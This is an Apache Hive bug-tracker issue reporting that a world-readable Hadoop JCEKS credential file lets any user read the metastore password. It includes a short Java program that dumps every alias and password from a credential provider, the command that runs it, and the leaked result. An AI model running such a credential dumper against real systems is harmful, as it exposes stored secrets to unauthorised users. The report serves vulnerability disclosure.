Uploaded image for project: 'Hive'
  1. Hive
  2. HIVE-19746

Hadoop credential provider allows to read passwords for every user

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Open
    • Priority: Blocker
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security
    • Labels:
      None

      Description

      This simple program allows to read any password from any jceks file:

      package com.test.app;
      
      import java.util.List;
      import org.apache.hadoop.conf.Configuration;
      import org.apache.hadoop.security.alias.CredentialProvider;
      import org.apache.hadoop.security.alias.CredentialProviderFactory;
      
      import java.io.IOException;
      
      public class PasswordReader {
        public static void main(String[] args) throws IOException {
          if (args == null || args.length == 0){
            throw new IllegalArgumentException("Credential provider path is to set");
          }
          String credentialProviderPath = args[0];
          Configuration configuration = new Configuration();
          configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
          CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
          List<String> aliases = credentialProvider.getAliases();
          for(String alias : aliases){
            System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
          }
        }
      }
      
      java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  jceks://hdfs/user/hive/hivemetastore.jceks
      

      RESULT

      javax.jdo.option.connectionpassword = 123456
      

      File jceks://hdfs/user/hive/hivemetastore.jceks has -rw-r--r-- permissions and hdfs:hdfs owner:group. We can't remove world readable permissions here, because Hive is configured for impersonation to allow users user than hdfs connect to HiveServer2. When removed world readable permissions and tried to connect as other user, I got the exception:

      2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
          at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
          at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
      

      Any ideas how to protect passwords (let's say restrict access to jceks://hdfs/user/hive/hivemetastore.jceks to 600) and at the same time be available to connect to HS2 as not admin user?

        Attachments

          Issue Links

            Activity

              People

              • Assignee:
                osayankin Oleksiy Sayankin
                Reporter:
                osayankin Oleksiy Sayankin
              • Votes:
                0 Vote for this issue
                Watchers:
                4 Start watching this issue

                Dates

                • Created:
                  Updated: